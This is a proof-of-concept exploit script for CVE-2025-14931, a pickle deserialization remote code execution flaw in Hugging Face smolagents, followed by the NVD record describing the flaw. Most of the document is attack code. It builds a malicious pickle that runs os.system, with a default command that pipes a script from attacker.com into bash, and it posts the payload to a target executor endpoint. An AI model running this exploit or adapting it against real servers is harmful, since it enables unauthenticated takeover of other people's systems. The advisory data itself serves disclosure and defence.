CVE-2025-14931

# CVE-2025-14931 PoC - Hugging Face smolagents Remote Python Executor RCE # This PoC demonstrates the deserialization vulnerability in smolagents import pickle import base64 import sys class MaliciousPayload: def __reduce__(self): # Execute arbitrary command during unpickling # Modify 'command' variable to change the executed payload command = "curl https://attacker.com/shell.sh | bash" return (os.system, (command,)) def generate_malicious_pickle(): """Generate malicious pickle payload for CVE-2025-14931""" import os payload = pickle.dumps(MaliciousPayload()) return base64.b64encode(payload).decode('utf-8') def exploit(target_url, command="id"): """ Exploit CVE-2025-14931 by sending malicious pickle data Args: target_url: URL of the vulnerable Remote Python Executor command: Command to execute on the target system """ import os import requests # Create payload with specified command class ExploitPayload: def __reduce__(self): return (os.system, (command,)) malicious_data = pickle.dumps(ExploitPayload()) # Send malicious payload to the vulnerable endpoint try: response = requests.post( target_url, data=malicious_data, headers={'Content-Type': 'application/octet-stream'}, timeout=10 ) print(f"[*] Payload sent to {target_url}") print(f"[*] Response status: {response.status_code}") return response.text except Exception as e: print(f"[!] Error: {e}") return None if __name__ == "__main__": print("CVE-2025-14931 PoC - Hugging Face smolagents RCE") print("=" * 50) # Example usage target = "http://target:8000/execute" cmd = "whoami" if len(sys.argv) > 1: target = sys.argv[1] if len(sys.argv) > 2: cmd = sys.argv[2] print(f"[*] Target: {target}") print(f"[*] Command: {cmd}") exploit(target, cmd)

{"cve": {"id": "CVE-2025-14931", "sourceIdentifier": "[email protected]", "published": "2025-12-23T21:15:48.493", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hugging Face smolagents Remote Python Executor Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face smolagents. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the parsing of pickle data. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28312."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1143/", "source": "[email protected]"}]}}